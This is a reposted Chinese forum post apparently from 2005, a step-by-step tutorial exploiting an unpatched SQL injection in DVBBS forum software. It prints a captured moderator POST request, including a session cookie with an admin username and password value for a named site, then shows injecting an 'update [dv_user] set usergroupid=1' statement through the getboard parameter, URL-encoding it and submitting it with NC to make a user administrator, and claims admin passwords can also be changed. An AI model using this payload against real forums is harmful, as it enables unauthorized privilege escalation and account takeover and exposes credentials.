收藏文章 楼主
动网BBS新漏洞利用动画
网友【血蜘蛛】 2005-06-21 21:39:52 分享在【时代发展的印记】版块    2    1
先找一个没有固顶帖子的版面,自己找找去。一个论坛总不可能哪个版块都有固顶吧?点进去看看有没有固定帖子什么的,我是用前天搞的一个论坛。当然要“符合”漏洞条件了。以前台管理员的身份登陆,也不一定要用前台管理员进去,一个斑竹就行,能固顶帖子就行了,然后随便发个帖子。

WSE抓包工具准备抓取提交的post信息,打开了之后点下确认操作。

截取到了post提交信息,复制下来,内容如下:

POST /bbs/admin_postings.asp?action=istop HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: shichr.com/bbs/admin_postings.asp?action=istop

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: [url=shichr.com]shichr.com

Content-Length: 144

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: dwebsiteshichr%2Ecom%2Dh%2D2003%2D3%2D14bbs=UserID=1&usercookies=0&password=3N263U7ggb314iwb&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=2182871850; ASPSESSIONIDCSDCCRAT=OLCEBFEBBKGIJKAAFDIEEHMF; upNum=0; Dvbbs=

istopaction=1&boardID=2&ID=7&title=&content=fff&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&alltop=1&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7

现在我们做什么呢?把getboard改成1,1);update [dv_user] set usergroupid=1 where userid=2;-- 不过我们得先转下unicode编码,用encoder.exe转一下,转换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20

把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为2的用户提到管理员组,不过只是前台管理员哦。然后算一下增加了多少个字符修改下Content-Length的值,我也懒得去数就改成278吧。修改完之后就用NC提交

提交前我给大家看一下数据库中的userid=2,哈,现在不是管理员

好,提交

我们看看userid=2的用户是否成为管理员了,userid=2对应的用户名是:Knight,为了省事,我就直接在后台查看下这个用户的权限是否为管理员了,

呵呵,真的提升为管理员了,这个漏洞不光可以将用户从普通权限提升为管理员,而且还可以直接更改后台管理员的密码,这够严重的吧?动网官方论坛到现在都还没出补丁。真够郁闷的

嘿,其实,我们只要是斑竹就可以做到,但是有点郁闷啊 ,哎,只有斑竹才可以,但是,我们也有这样一个思想,以后再想怎么利用吧,这文章来自卫队主站上,我给大家找下看,哈哈

会员下载区开通.VIP软件免费下载.,

完!

红色特卫队正在组建卫队原创组,希望大家不要保留技术,积极参与我们,谢谢~~3Q

〖红色特卫队〗-------- by weiyi
meiguo.com 发布人签名/座右铭·有时你看似是一件很吃亏的事,往往会变成非常有得的事。
·凡事都留有余地,因为人是人,不是神,不免有错处,可以原谅人的地方,就原谅人。
·好的时候不要看得太好,坏的时候不要看的太坏。
大家都在看
回复/评论列表
默认   热门   正序   倒序
蝶舞门人
2F
太强,不能不顶----
 0   2005-09-15 10:13:37  回复
meiguo.com 创始人

emotion

1   2005-06-21 21:39:52  回复

回复/评论:动网BBS新漏洞利用动画

暂无用户组 升级
退出
等级:0级
美果:
美过
精华推荐
  1. 中美稀土博弈,美国政策在急转直下!
  2. 美国在AI竞争中失利了?阿里千问模型在全球领先
  3. 美国政府批准了对台3.3亿美元的军售
  4. 恢复或加入?重获中国国籍的路径比较
  5. 中美因为“稀土管制”引发的贸易摩擦升级了
  6. 美国司法部起诉了柬埔寨“电信诈骗集团”的头目
  7. 45岁后“人生黄金期”是认知和创造力的新高峰
  8. 马斯克的模块化生产技术在革新汽车行业
  9. 中美AI竞争的新格局已定?
  10. 中美航班“绕行俄罗斯领空”政策引关注
  11. 川普政府“双失利”?
  12. 美国的房地产市场显现了矛盾信号
  13. 川普总统宣布加沙战争结束,峰会聚焦“中东和平”!
  14. 700万人参与了反川普集会?
  15. 美国“H-1B”签证新规:在境内的申请人,免缴10万美元费用!
  16. 中美经贸磋商“展现战略对称”新态势
  17. 一美分硬币“Penny”铸造历史正式终结
  18. 谷歌的科学家已经连续两年摘得了诺贝尔奖
  19. MIT稳居了CS榜首!美国大学的最新排名出炉
  20. 川普总统签署了备忘录,贩毒集团成为“国家之敌”!
  21. 佛罗里达的一名中学生在AI提问,然后被捕了!
  22. 人类史上“最贵CEO”诞生!马斯克的“万亿薪酬”背后
  23. 中美贸易的争端升级,中国实施“长臂管辖”颁布3项针对性措施!
  24. 联邦法院驳回了川普政府的“出生公民权”行政令
  25. ICE启动了在社交媒体的全天候监控项目
  26. 川普政府打算发放两千美元的关税补贴
  27. 美国青少年“67”流行语的现象引关注
  28. 华人购房遭遇国籍歧视,法院裁决后依然隐忧犹存!
  29. 川普政府再次出奇招!拒绝所有胖子的移民申请?
  30. 中国已经全额缴纳了联合国会费,联合国的财政危机缓解!
  31. AWS最大区域故障,带崩多项服务!
  32. 全球高等教育的新趋势:留学生求学地“多元化”
  33. 中美两国元首在釜山会晤:就关税、大豆和稀土已经达成共识
  34. 骨胶水的研发获突破,临床试验显示了安全有效!
  35. 黄仁勋警示川普政府,再不开放“对华AI芯片出口”就来不及啦!
  36. 学习英语12年后,终于实现了“美国梦”!

美国动态 美果搜索

Your IP: 216.73.216.137, 2025-11-29 02:56:07

Processed in 0.0768 second(s)

头像

用户名:

粉丝数:

签名:

资料 关注 好友 消息
已有0次打赏
(1) 分享
分享
取消